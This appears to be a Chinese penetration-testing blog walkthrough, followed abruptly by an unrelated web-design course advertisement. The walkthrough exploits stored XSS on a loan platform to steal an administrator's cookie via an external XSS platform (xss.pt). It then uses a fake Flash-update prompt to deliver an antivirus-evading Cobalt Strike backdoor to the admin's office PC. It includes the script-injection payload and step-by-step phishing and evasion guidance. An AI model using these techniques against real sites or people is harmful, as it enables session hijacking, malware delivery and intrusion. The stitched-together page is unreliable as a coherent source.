整合營銷服務商
電腦端+手機端+微信端=數據同步管理
免費咨詢熱線:
電腦端+手機端+微信端=數據同步管理
免費咨詢熱線:
請注意:
本文僅用于技術討論與研究,對于所有筆記中復現的這些終端或者服務器,都是自行搭建的環境進行滲透的。我將使用Kali Linux作為此次學習的攻擊者機器。這里使用的技術僅用于學習教育目的,如果列出的技術用于其他任何目標,本站及作者概不負責。
名言:
你對這行的興趣,決定你在這行的成就!
2021最新整理網絡安全\滲透測試/安全學習(全套視頻、大廠面經、精品手冊、必備工具包)一>關注我,私信回復“資料”獲取<一
網絡釣魚是社會工程學攻擊方式之一,主要是通過對受害者心理弱點、本能反應、好奇心、信任、貪婪等心理陷阱進行諸如欺騙、傷害等危害手段!
網絡釣魚攻擊是個人和公司在保護其信息安全方面面臨的最常見的安全挑戰之一。無論是獲取密碼等,還是其他敏感信息,黑客都在使用電子郵件、社交媒體、電話和任何可能的通信方式竊取有價值的數據。
網絡釣魚攻擊的興起對所有組織都構成了重大威脅。重要的是,如果他們要保護自己的信息,所有組織都應該知道如何發現一些最常見的網絡釣魚騙局。同樣還要熟悉攻擊者用來實施這些騙局的一些最常見的技術類型。
這篇主要演示如何利用XSS植入釣魚,獲得管理員內部電腦權限!
黑客(攻擊者):
IP:192.168.1.9
系統:kali.2020.4
kali上作為cs的服務端!
VPS服務器:
thinkphp平臺地址:http://test1.dayuixiyou.cn/
釣魚地址:http://flash.dayuixiyou.cn
辦公電腦:
系統:windwos7
雙網卡:
192.168.175.153
10.10.1.5
目前kali上運行了Cobalt strike ,攻擊者在自己的公網VPS服務器上制作了后門頁面釣魚,通過滲透發現thinkphp貸款平臺頁面存在XSS漏洞利用,通過插入XSS-js代碼,植入鏈接,最終黑客控制管理員辦公電腦的過程!!
此次演示貸款thinkphp平臺在公網服務器上!
進入個人中心!
注冊用戶名密碼!
登錄用戶名密碼后,普通用戶界面!點擊設置!
輸入結算信息,測試下!
輸入:
測試結果修改成功!查看下前端…
查看源代碼-編輯后查看到沒變動,XSS代碼還是存在…說明存在XSS攻擊
https://xss.pt/xss.php?do=login
進入XSS利用平臺,google也有很多別的平臺!!
隨意注冊一個賬號!
創建一個新的項目,隨意填寫!
選擇Keepsession保持會話!
下一步!
會彈出需要執行的XSS利用代碼…選擇標準代碼測試!
</tExtArEa>'"><sCRiPt sRC=https://xss.pt..aJ></sCrIpT>
</tExtArEa>'"><sCRiPt sRC=https://xss.pt/..aJ></sCrIpT>
這一段就是payload!將XSS連接信息返回到https://xss.pt平臺上!
提交信息后,可看到網絡net中XSS執行成功了…
執行成功,那么XSS平臺就收到了信息,可看到!
點擊提現…
申請結算,成功后,會將XSS執行代碼轉發到后臺結算該模塊中!
當后臺管理員訪問管理界面,給客戶結算資金的時候,點擊提現申請模塊!就會執行XSS植入的代碼!!
這時候,就返回了管理員的cookie和URL信息!
目錄掃描獲得管理后臺登錄頁面,通過Burp suite轉包攔截后!
將XSS平臺獲取XSS漏洞植入代碼返回的包中,修改其中的url和cookie信息!
send執行后,通過cookie進入到了管理員后臺!
復制URL!
瀏覽器中訪問后,正常進入管理員后臺!
在公網服務器搭建釣魚頁面,任何能訪問互聯網客戶都可以訪問該頁面!
利用Cobal Strike生成C#語言的shell…
利用該shell進行混淆,并利用python的tinyaes模塊混淆也行,在來個分離免殺,最后利用pyinstaller生成exe外殼…必過全國殺毒軟件!(不演示過程)
將flash修改名字為:flashplayer_install_cn.exe(或者修改為update等吸引人下載的名稱都行)
這是Flash貸款平臺源碼文件目錄!!
修改index.html代碼,找到其中href="進行修改為:flashplayer_install_cn.exe
意思就是點擊頁面立即下載就能自動下載目錄下的exe后門文件!
在準備個js文件,意思是執行該js后,會在頁面提示:
您的 FLASH 版本過低,嘗試升級后訪問該頁面!
并訪問到該頁面:http://flash.dayuixiyou.cn/
將exe和js都上傳到功能網服務器apache底層!
測試訪問可看到正常讀取,確保內網管理員能執行XSS后訪問到js文件,這里就可以開始了!
可看到利用(三)中XSS利用的方法,執行插入:
“><”
#需要前后加入閉合 “> <”
當"立即提交" 后直接執行了XSS植入的js文件,并提示了js中的內容!!
然后點確定后,直接跳轉到flash頁面!
和(三)中的方法一樣,需要在后臺管理頁面也執行XSS,需要結算金額,讓管理員去結算的時候點擊執行XSS!
5、執行XSS下載flash
可看到內網管理員上班期間,登錄到管理后臺,登錄管理員用戶后,工作職責需要給客戶結算金額,點擊了提現申請,一般客戶安全意識極差!!
點擊完成后,出現了您的 FLASH 版本過低,嘗試升級后訪問該頁面!,一般情況下都會點擊確認!
確認后跳轉到flash頁面,逼真的頁面!!點擊立即下載!!
這里有個20.1MB的大小信息,這里簡單在html修改下數字和EXE內容大小即可!
可看到下載了該后門,這里圖標我沒修改,google或者百度利用Folder Changer修改成flash安裝包的圖標更逼真!!
這里的exe是全免殺的,殺毒軟件都無法放行!!
6、成功XSS釣魚
執行安裝!
成功在kali攻擊機上的CS上線,可看到獲取到了管理員電腦的權限!!
這里通過滲透中,找到了某平臺的XSS漏洞,利用XSS漏洞植入代碼執行,誘騙到了對方客服或者管理員的內網電腦權限!
其中最少需要熟悉如何搭站、HTML、js、域名、XSS、免殺、CS4等等知識才可搭建!
那么很多人都說flash都是經典的釣魚漏洞了,全國警惕性都會高很多,那么我還是老話,提供的是思路,如果是一個破解軟件,一個購買網站,一個利用虛榮心或者是貪小便宜的購物頁面,等等進行釣魚,進行各類的植入的話,那有多少人會中招?
希望大家提高安全意識,沒有網絡安全就沒有國家安全!
雖然基礎,但是必須牢記于心。
人們常說隔行如隔山,對于很多零基礎想要學網頁設計的人來說,覺得這是一門非常復雜難懂的學科,讓很多想要學習這門學科的人望而卻步。
隨著IT技術的高速發展,行業對網頁設計人才需求不斷增加,各大網站、廣告公司、設計公司都在大量招聘網頁設計人員。目前網頁設計是發展前景最好,人才需求巨大的行業之一。據統計,我國目前從事網頁設計的人員不多,而專門設計網頁的人才只有幾萬人。因此,未來網頁設計行業對人才的需求會不斷上升,隨之衍生的網頁設計行業其他職位的就業前景也會非常好。
30秒測試你適不適合學網頁設計:
http://www.tianhujy.com/list-93-1.html?wm=tt_lyt_wysj (復制到網址框打開)
成為網頁設計師需要學靜態網頁:
Dreamweaver CS4:網頁布局、制作;Html&Css簡介;網站管理與維護、上傳與下載;案例分析
Fireworks:美工設計、網頁配色;CI、LOGO、Banner的制作;常見網頁動畫制作、網頁布局
Flash CS4:經典網頁動畫、廣告、片頭、賀卡設計與分析;MTV制作、交互式網站簡介
Photoshop CS4:Photoshop操作基礎、圖像優化處理、經典實例分析與制作、gif動畫、廣告gif圖片
Illustrator CS4:廣告招牌制作、燈箱廣告、服裝廣告設計、企業徽標設計、名片設計
成為網頁設計師需要學動態網頁:
Html語言詳細解介、CSS樣式、IIS、C#語言、Asp. net動態、SQLServer數據庫、Access數據(送)、JavaScript、Flash8.0高級編程、網站籌劃、網站推廣、電子購物車、ChatRoom、BBS制作。注:此部分基本上是程序員工作,并不是網頁設計師所要學會的。
零基礎新手如何學習網頁設計?
(1).首先要精通設計軟件,把Photoshop玩轉,這是網頁設計的主力工具!
(2).深入學習排版設計、色彩構成,掌握視覺基礎規律(構成、透視、光影)
(3).掌握網頁設計規范,了解常見的網頁布局形式,學習交互設計等基礎知識。
(4).了解前端代碼HTML、CSS、JS、JQuery的運用,學一款代碼編輯軟件(如:Dreamweaver)
(5).了解你設計網站的公司及產品,熟悉這個公司及其產品面向的人群!
(6).拓展學習網站優化、開發、后臺數據處理常識(加分項目!)
前四個是基本功,后面的是加分項。越靠前越重要!
給自己制作個學習規劃也是很重要的,推薦這里:
http://www.tianhujy.com/tg-81.html?wm=tt_lyt_wysj (復制到網址框打開)
網頁的代碼等確實晦澀難懂,但是只要你有耐心和恒心堅持學下去,入門之后就是一馬平川,會覺得越學越簡單,越學越輕松。
著國內互聯網的快速發展,中國網民的數量大量的增加。所以很多人通過互聯網去實現自己的要求。比如說現在很流行的網購、通過招聘網站進行求職等等,隨著社會的發展,人們的生活會更加的依賴網絡。因此每個人,每個公司都想去做網站,個人通過網站推廣自己、公司通過網站推廣公司的品牌與知名度、獲得更大的利益化。所以學網頁設計有沒有前途顯而易見。
30秒測試你適不適合學網頁設計:
http://www.tianhujy.com/list-93-1.html?wm=tt_lyt_wysj (可復制到網址框打開哦)
*請認真填寫需求信息,我們會在24小時內與您取得聯系。
